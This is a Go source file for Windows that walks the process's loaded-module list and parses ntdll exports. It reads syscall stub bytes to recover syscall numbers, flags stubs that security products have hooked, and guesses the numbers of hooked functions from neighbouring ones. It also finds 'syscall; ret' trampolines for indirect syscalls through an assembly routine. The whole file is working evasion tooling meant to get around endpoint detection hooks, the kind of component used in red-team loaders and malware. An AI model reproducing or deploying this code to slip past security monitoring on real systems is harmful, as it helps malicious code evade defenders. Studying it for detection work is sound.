func bpSyscall(ssn uint16, argh ...uintptr) (errcode uint32)

func (dll *dllstruct) PrintExports() {
	noPrint := []string{"NtQuerySystemTime", "ZwQuerySystemTime"}

	tNt := table.NewWriter()
	tNt.AppendHeader(table.Row{"#", "Function Address", "Function Name", "SysCallNo (SSN)", "Trampoline", "Hooked?"})
	for i, fun := range dll.exportedNtFunctions {
		if slices.Contains(noPrint, fun.name) {
			continue
		}
		tNt.AppendRow(table.Row{i, fmt.Sprintf("0x%x", fun.functionAddress), fun.name, fmt.Sprintf("0x%x", fun.syscallno), fmt.Sprintf("0x%x", fun.trampoline), fun.isHooked})
	}
	tZw := table.NewWriter()
	tZw.AppendHeader(table.Row{"#", "Function Address", "Function Name", "SysCallNo (SSN)", "Trampoline", "Hooked?"})
	for i, fun := range dll.exportedZwFunctions {
		if slices.Contains(noPrint, fun.name) {
			continue
		}
		tZw.AppendRow(table.Row{i, fmt.Sprintf("0x%x", fun.functionAddress), fun.name, fmt.Sprintf("0x%x", fun.syscallno), fmt.Sprintf("0x%x", fun.trampoline), fun.isHooked})
	}
	fmt.Println(tNt.Render())
	fmt.Println(tZw.Render())
}

func (dll *dllstruct) UnhookFuncs() {
	for i, fun := range dll.exportedNtFunctions {
		if fun.isHooked {

			dll.exportedNtFunctions[i].syscallno = dll.exportedNtFunctions[i-1].syscallno + 1
			dll.exportedNtFunctions[i].isHooked = false
		}
	}
	for i, fun := range dll.exportedZwFunctions {
		if fun.isHooked {
			dll.exportedZwFunctions[i].syscallno = dll.exportedZwFunctions[i-1].syscallno + 1
			dll.exportedZwFunctions[i].isHooked = false
		}
	}
}

func (fun *Exportfunc) GetSyscallNumbers(address uintptr) {

	funcbytes := (*[5]byte)(unsafe.Pointer(fun.functionAddress))[:]

	if funcbytes[0] == 0x4c && funcbytes[1] == 0x8b && funcbytes[2] == 0xd1 && funcbytes[3] == 0xb8 { // Check if the function is hooked.
		fun.syscallno = *(*uint16)(unsafe.Pointer(&funcbytes[4])) // Get Syscall Number
		fun.isHooked = false
	} else {
		fun.syscallno = 0xffff // when hooked set the syscall number 0xff
		fun.isHooked = true
	}

	//fmt.Printf("Func RVA: %x , nameRVA: %x , name: %s, syscallno : %x\n", exFunc.funcRVA, exFunc.nameRVA, exFunc.name, exFunc.syscallno)

}

func (dll *dllstruct) GetModuleExports() {

	exclusions := []string{"NtdllDefWindowProc_A", "NtdllDefWindowProc_W", "NtdllDialogWndProc_A", "NtdllDialogWndProc_W", "NtGetTickCount"}

	var absAddress uintptr

	for i := 0; i < int(dll.exportDirectory.NumberOfNames); i++ {
		funcRVA := *((*uint32)(unsafe.Pointer(dll.address + (uintptr(dll.exportDirectory.AddressOfFunctions) + uintptr((i+1)*0x4)))))
		nameRVA := *((*uint32)(unsafe.Pointer(dll.address + (uintptr(dll.exportDirectory.AddressOfNames) + uintptr(i*0x4)))))
		nameAddr := dll.address + uintptr(nameRVA)
		nameRVAbyte := (*[4]byte)(unsafe.Pointer(nameAddr))[:]
		name := windows.BytePtrToString(&nameRVAbyte[0])

		absAddress = dll.address + uintptr(funcRVA)
		for j := 0; j < 100; j++ {
			if *(*byte)(unsafe.Pointer(absAddress)) == 0x0f {
				if *(*byte)(unsafe.Pointer(absAddress + 1)) == 0x05 {
					if *(*byte)(unsafe.Pointer(absAddress + 2)) == 0xc3 {
						break
					}
				}
			}
			absAddress += 1
		}

		if strings.HasPrefix(name, "Nt") && !slices.Contains(exclusions, name) {
			funcExp := Exportfunc{
				funcRVA:         funcRVA,
				functionAddress: dll.address + uintptr(funcRVA),
				name:            name,
				trampoline:      absAddress,
			}
			funcExp.GetSyscallNumbers(dll.address)
			dll.exportedNtFunctions = append(dll.exportedNtFunctions, funcExp)
		}

		if strings.HasPrefix(name, "Zw") {
			funcExp := Exportfunc{
				funcRVA:         funcRVA,
				functionAddress: dll.address + uintptr(funcRVA),
				name:            name,
				trampoline:      absAddress,
			}
			funcExp.GetSyscallNumbers(dll.address)
			dll.exportedZwFunctions = append(dll.exportedZwFunctions, funcExp)
		}

	}
	sort.SliceStable(dll.exportedNtFunctions, func(i, j int) bool {
		return (dll.exportedNtFunctions)[i].funcRVA < (dll.exportedNtFunctions)[j].funcRVA
	})
	sort.SliceStable(dll.exportedZwFunctions, func(i, j int) bool {
		return (dll.exportedZwFunctions)[i].funcRVA < (dll.exportedZwFunctions)[j].funcRVA
	})
}

// Get Image Export directory. We are interested in
// - AddressofFunctions
// - AddressOfNames
// - AddressOFNameOrdinals (maybe in the future)
// - Number of functions
func (dll *dllstruct) GetImageExportDirectory() {

	dll.exportDirectory.Characteristics = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress)))
	dll.exportDirectory.TimeDateStamp = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x4)))
	dll.exportDirectory.MajorVersion = *((*uint16)(unsafe.Pointer(dll.exportDirectoryAddress + 0x8)))
	dll.exportDirectory.MinorVersion = *((*uint16)(unsafe.Pointer(dll.exportDirectoryAddress + 0xa)))
	dll.exportDirectory.Name = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0xc)))
	dll.exportDirectory.Base = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x10)))
	dll.exportDirectory.NumberOfFunctions = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x14)))
	dll.exportDirectory.NumberOfNames = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x18)))
	dll.exportDirectory.AddressOfFunctions = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x1c)))
	dll.exportDirectory.AddressOfNames = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x20)))
	dll.exportDirectory.AddressOfNameOrdinals = *((*uint32)(unsafe.Pointer(dll.exportDirectoryAddress + 0x24)))

}

func (dll *dllstruct) getExportTableAddress() uintptr {
	e_lfanew := *((*uint32)(unsafe.Pointer(dll.address + 0x3c)))
	ntHeader := dll.address + uintptr(e_lfanew)
	fileHeader := ntHeader + 0x4
	// https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_file_header
	optionalHeader := fileHeader + 0x14 // 0x14 is the size of the image_file_header struct
	exportDir := optionalHeader + 0x70  // offset to export table
	exportDirOffset := *((*uint32)(unsafe.Pointer(exportDir)))
	dll.exportDirectoryAddress = dll.address + uintptr(exportDirOffset)
	return dll.exportDirectoryAddress
}

func GetStructOfLoadedDll(name string) (dllstruct, error) {
	modules := ListDllFromPEB()
	for _, module := range modules {
		if module.name == name {
			return module, nil
		}

	}
	return dllstruct{}, fmt.Errorf("dll not Found")
}

func PrintModules() {
	t := table.NewWriter()
	fmt.Printf("---------------------------------------------\nLoaded modules in current process\n")
	t.AppendHeader(table.Row{"#", "DLL Name", "Address"})

	for i, module := range ListDllFromPEB() {
		t.AppendRow(table.Row{i, module.name, fmt.Sprintf("0x%x", module.address)})
	}
	fmt.Println(t.Render())
}

// adds all loaded modules and their base addresses in a slice
func ListDllFromPEB() []dllstruct {

	peb := windows.RtlGetCurrentPeb()
	moduleList := peb.Ldr.InMemoryOrderModuleList
	a := moduleList.Flink
	loadedModules := []dllstruct{}
	for {

		listentry := uintptr(unsafe.Pointer(a))
		// -0x10 beginning of the _LDR_DATA_TABLE_ENTRY_ structure
		// +0x30 Dllbase address
		// +0x58 +0x8 address holding the address pointing to base dllname
		// offsets different for 32-bit processes
		DllBase := uintptr(listentry) - 0x10 + 0x30
		BaseDllName := uintptr(listentry) - 0x10 + 0x58 + 0x8

		v := *((*uintptr)(unsafe.Pointer(BaseDllName)))
		//fmt.Printf("%p\n", (unsafe.Pointer(v))) // prints the address that holds the dll name

		s := ((*uint16)(unsafe.Pointer(v))) // turn uintptr to *uint16
		dllNameStr := windows.UTF16PtrToString(s)
		if dllNameStr == "" {
			break
		}

		dllbaseaddr := *((*uintptr)(unsafe.Pointer(DllBase)))
		//fmt.Printf("%p\n", (unsafe.Pointer(dllbaseaddr))) // prints the dll base addr
		loadedModules = append(loadedModules, dllstruct{
			name:                   dllNameStr,
			address:                dllbaseaddr,
			exportDirectoryAddress: 0,
			exportDirectory:        IMAGE_EXPORT_DIRECTORY{Characteristics: 0, TimeDateStamp: 0, MajorVersion: 0, MinorVersion: 0, Name: 0, Base: 0, NumberOfFunctions: 0, NumberOfNames: 0, AddressOfFunctions: 0, AddressOfNames: 0, AddressOfNameOrdinals: 0},
			exportedNtFunctions:    []Exportfunc{},
			exportedZwFunctions:    []Exportfunc{},
		})
		a = a.Flink
	}

	return loadedModules
}

Last updated